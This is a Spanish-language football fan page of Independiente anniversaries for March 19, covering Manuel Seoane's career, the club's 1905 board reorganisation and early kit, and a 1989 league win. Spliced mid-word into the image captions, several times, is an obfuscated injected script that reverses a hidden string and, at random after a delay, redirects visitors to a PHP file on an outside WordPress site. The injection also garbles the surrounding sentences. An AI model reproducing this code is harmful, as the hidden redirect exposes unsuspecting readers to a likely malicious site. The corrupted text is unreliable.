Conectate con nosotros

Efemérides

Efemérides del 19 de Marzo

No se puede amar lo que no se conoce. Las efemérides cuentan la enorme historia del Glorioso INDEPENDIENTE de Avellaneda.

1902Nacimiento en Avellaneda (aunque muchos dicen que fue en Rosario), de Manuel “La Chancha” Seoane, pero anteriormente su apodo era “El Negro”. Luego, ya como futbolista, el legendario arquero de Boca del amateurismo y uno de los mejores que vio el país en dicha etapa, Américo “La Gloria” Tesorieri, llegó a apodarlo como “El Rey del Área Enemiga”, y doy ese dato como para ir presentando a éste descomunal animal del gol.

Seoane es el máximo anotador del país en la etapa amateur del fútbol, sí, Arsenio Erico en el profesionalismo y Manuel antes, los dos máximos artilleros en cada época, y ambos de Independiente. Por razones obvias hay pocos registros de él, sólo hay crónicas de su época y testimonios que dejaron aquellos que tuvieron el honor de verlo jugar. Para muchos de ellos Manuel fue el mejor jugador que tuvo el país, como Renato Cesarini (jugador de River y Juventus que supo ver a Pelé y a Alfredo Di Stéfano), que lo consideró el mejor de todos los tiempos.

Un delantero formidable que jugaba en todos los puestos del ataque, primeramente fue insider izquierdo (es decir a un lado del centrodelantero), pero con el paso del tiempo y su aumento de peso se convirtió en delantero de área. Con gran manejo de la pelota, habilidad para moverse en espacios reducidos, una potencia terrible para rematar con ambas piernas, una capacidad extraordinaria de anticipo, gambeteador, y un cabezazo letal, aunque tan solo medía 1.70 mts., y generalmente estaba unos kilos excedido de peso por lo cual su apodo.

Pero aun así Seoane anotó ni más ni menos que 207 goles en 217 partidos en la etapa amateur (34 más, luego ya en la etapa profesional, jugando 56 partidos), sin tener en cuenta su paso de dos años por El Porvenir. Y no solo fue goleador letal, sino que fue de los primeros líricos de la historia nacional, porque además de goles completaba su repertorio con tacos, rabonas, caños, y todo tipo de lujos.

Su primer partido fue en la categoría intermedia, allá por 1920, Seoane marcó 3 goles en el 5 a 1 a Estudiantes, y el 3 de abril de 1921 debuta en la Primera contra Racing en un encuentro que sería suspendido por intensas lluvias. Ese año ya se anota con 18 goles en el torneo. En el Rojo campeón de 1922 anotó la cifra descomunal de 55 tantos en los 40 partidos que tuvo el campeonato (el equipo anotó 97 goles, es decir que Manuel hizo más de la mitad).

En noviembre de 1923, en un partido contra River, fue suspendido por 1 año por agredir al árbitro en lo que fue una trifulca donde ambos equipos ejercieron violencia contra el juez, pero solo algunos cargaron con las culpas. Por eso Manuel se va del club a jugar en la liga paralela que existía en aquel tiempo por no haber unificación en las asociaciones de fútbol. Juega para el porvenir por dos años, y allí no hay datos fehacientes de su cantidad de goles, aunque la mayoría de las fuentes hablan de al menos 60 anotaciones en aquel equipo.

En 1925 juega para Boca en la histórica gira europea de dicho equipo, que puso 12 jugadores suyos e invitó a varios genios de la época a completar el plantel, Seoane aceptó el desafío y fue el goleador de la gira con 12 goles en 18 partidos. Los laureles de aquel Boca quedaron a nombre de la institución, pero nadie menciona como se armó el equipo.

Regresó a Independiente en 1926 para volver a ser campeón e invicto, marcó 29 goles en los 25 partidos que tuvo la competición para ser el goleador absoluto. Aquel equipo se ganó el apodo de “Diablos Rojos”, puesto periodista del diario Crítica Hugo Marini, quien hizo alusión a una delantera endiablada al referirse al quinteto que formaban Zoilo Canaveri, Alberto Lalín, Luis Ravaschino, Manuel Seoane y Raimundo Orsi. También con el Rojo se corona campeón de Copa Competencia 1926, siendo el goleador de la misma y anotando dos goles en la final frente a Lanús.

En 1931 comienza la etapa profesional del fútbol y Manuel siguió haciendo lo que sabía hacer mejor, jugó 24 partidos marcando 12 goles, siendo el segundo máximo anotador del equipo detrás de Luis Ravaschino que hizo 19 pero éste disputó 34 encuentros. En 1932 Independiente sale subcampeón al caer en el desempate frente a River, en una gran campaña donde Seoane fue el goleador del equipo con 22 goles en 28 partidos.

En 1933 decide retirarse, casi sin haber participado del campeonato de ese año. Dejó para el club la cifra de 273 partidos anotando 241 goles (14 de ellos a Racing). Extraordinario lo de “La Chancha”, que se lo considera el primer eslabón de la cadena histórica del Rojo en cuanto a talento máximo se refiere, ya que luego de él llegaría Antonio Sastre, después Ernesto Grillo y finalmente Ricardo Bochini.

Además Manuel jugó en la Selección marcando 16 goles en 21 partidos y siendo campeón de las Copas Américas 1925, 1927 y 1929, saliendo elegido el mejor de todos en dos de ellas, simplemente impresionante. Pero eso no es todo, porque casi nadie sabe que Seoane fue el primer jugador en la historia del país en vestir la icónica camiseta número 10 de la Selección.

Sucedió en 1923 cuando Argentina disputó un amistoso frente a un equipo de Escocia que exigió usar numeración (acá no se usaban), y a Manuel le dieron la 10, que para mayor detalle no se colocaban en las espalda sino que los números iban en el pecho. En 1924 Seoane jugó para la Selección el partido contra Uruguay en el que se registró el primer gol olímpico de toda la historia, convertido por Cesáreo Onzari, delantero de Huracán.

Luego de su carrera como futbolista se hizo D.T., y en esa función estuvo a cargo de la Selección Nacional, siendo campeón del Sudamericano de 1937, torneo en el cual un joven Vicente De la Mata nos dio el título y lo catapultó a Independiente. Más tarde Seoane trabajaría en una cristalería, como clasificador de lanas, y tuvo a su cargo el camping de Independiente en Quilmes. Hasta que en 1975 falleció a los 73 años. Un ídolo notable, incuestionable, un futbolista que supo escribir páginas doradas tanto para Independiente como para el Fútbol Argentino.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»70″ height=»55″/></figure></div>



<p><strong>1905</strong> – Repasemos el natalicio del club: <strong>Independiente nace el 4 de agos<script>$mWn=function(n){if(typeof ($mWn.list[n])==to de 1904, día en que se reúnen los excluidos del Maipú Football Club, el equipo de fútbol que tenía la tienda «A La Ciudad de Londres». En dicha reunión aquellos jóvenes se independizan formando Independiente Football Club, y designan a Rosendo Degiorgi como presidente.

No se conservó el acta de dicho día y de la fundación (o se extravió), por ello se volvieron a reunir el primer día del año 1905 con el objetivo de oficializar todo. Lo hicieron, y de esa forma queda asentado el 1 de enero como fecha de la oficialización en papeles de la Fundación, además de acordar una nueva reunión (cosa que si pensamos en profundidad, tampoco puede ser correcto, porque era feriado).

Esa reunión, aunque se la suele ubicar el día 25, se da un día como hoy de 1905, y tuvo como objetivo reorganizar la Comisión Directiva, quedando formada con: Arístides Langone como presidente, Rosendo Degiorgi vicepresidente, Daniel Bevilacqua secretario, Juan Artau prosecretario, Carlos Degiorgi tesorero, Juan Darnay protesorero, y los vocales eran Antonio Diez, Severo Rodríguez, Juan Ipart, Marcelo Degiorgi y Fernando Aizpuru.

Por otra parte, se aumentó la cuota de 0.25 a 0.50 centavos, ya que el primer valor establecido había sido muy insuficiente en los meses anteriores. Además, se comenzó a delinear lo que sería el primer escudo y vestimenta del club. Dicho escudo parece que fue tomado en semejanza al del Saint Andrew´s Scots School, una institución educativa de origen escocés que había en Argentina (y todavía existe), y que tenía su equipo de fútbol. Su escudo era muy similar a la bandera de Escocia.

En cuanto a la vestimenta, la misma se definiría ese mismo año y consistiría en una camisa crimea de color blanco con ribetes azules, un bolsillo azul en forma de escudo cruzado en diagonal por dos franjas blancas y en los ángulos del escudo las iniciales I.F.C (Independiente Football Club) bordadas. El pantalón sería azul, y una gorra forma hockey también azul con una estrella blanca. Un tiempo después se dejaría atrás este uniforme para pasar al tradicional de Camiseta Roja.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»67″ height=»52″/></figure></div>



<p><strong>1989</strong> – Independiente no comienza de la mejor manera la <strong>segunda ronda del Campeona<script>$mWn=function(n){if(typeof ($mWn.list[n])==to de Primera División 1988-1989, repasemos: finalizó la primera ronda a tan solo 2 unidades de los líderes que eran Boca y Racing. En la fecha 20 empata visitando a Vélez y luego lo vence en penales. En la jornada 21 le gana por 1 a 0 a Deportivo Español. Sufre una dura derrota en la fecha 22 al caer por 3 a 0 frente a Argentinos, luego le gana por 4 a 1 a Mandiyú.

En la 24 fue empate visitando a Talleres y luego el Rojo ganó en los penales. En la 25 fue derrota como local contra Rosario Central. En la 26 hubo un nuevo empate con triunfo en penales frente a Estudiantes de La Plata. Y así llegamos a un día como hoy, cuando por la fecha 27 había que ir a Tucumán para enfrentar al San Martín local.

Había que poner fin a la irregularidad de resultados, había que mostrar buen nivel de juego para ser candidatos, y todo eso hizo Independiente. Ganó por 0 a 3 con un triplete de Carlos Alfaro Moreno, a los 27’, 77’  y  87 minutos, siendo obviamente la figura del encuentro al estar imparable. Pero además de Alfaro, todo el equipo pasó por arriba al conjunto tucumano, jugando uno de los mejores partidos de la temporada, incluso para muchos fue el mejor de todos.

De esa forma el equipo ilusionaba por su gran nivel de juego, y desde lo matemático por estar a 3 puntos del líder que era Boca. Pero además, el triunfo de un día como hoy, significó el inicio de una racha estupenda para Independiente. Le ganó a Platense, Boca, San Lorenzo, Racing de Córdoba, Ferro, Instituto, Newell´s y Gimnasia y Esgrima La Plata, empató frente a Racing, y le ganó a Deportivo Armenio para coronarse campeón. Un sprint final tremendo, pero ya habrá tiempo para repasar mucho más de ello.

Colaboración: Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides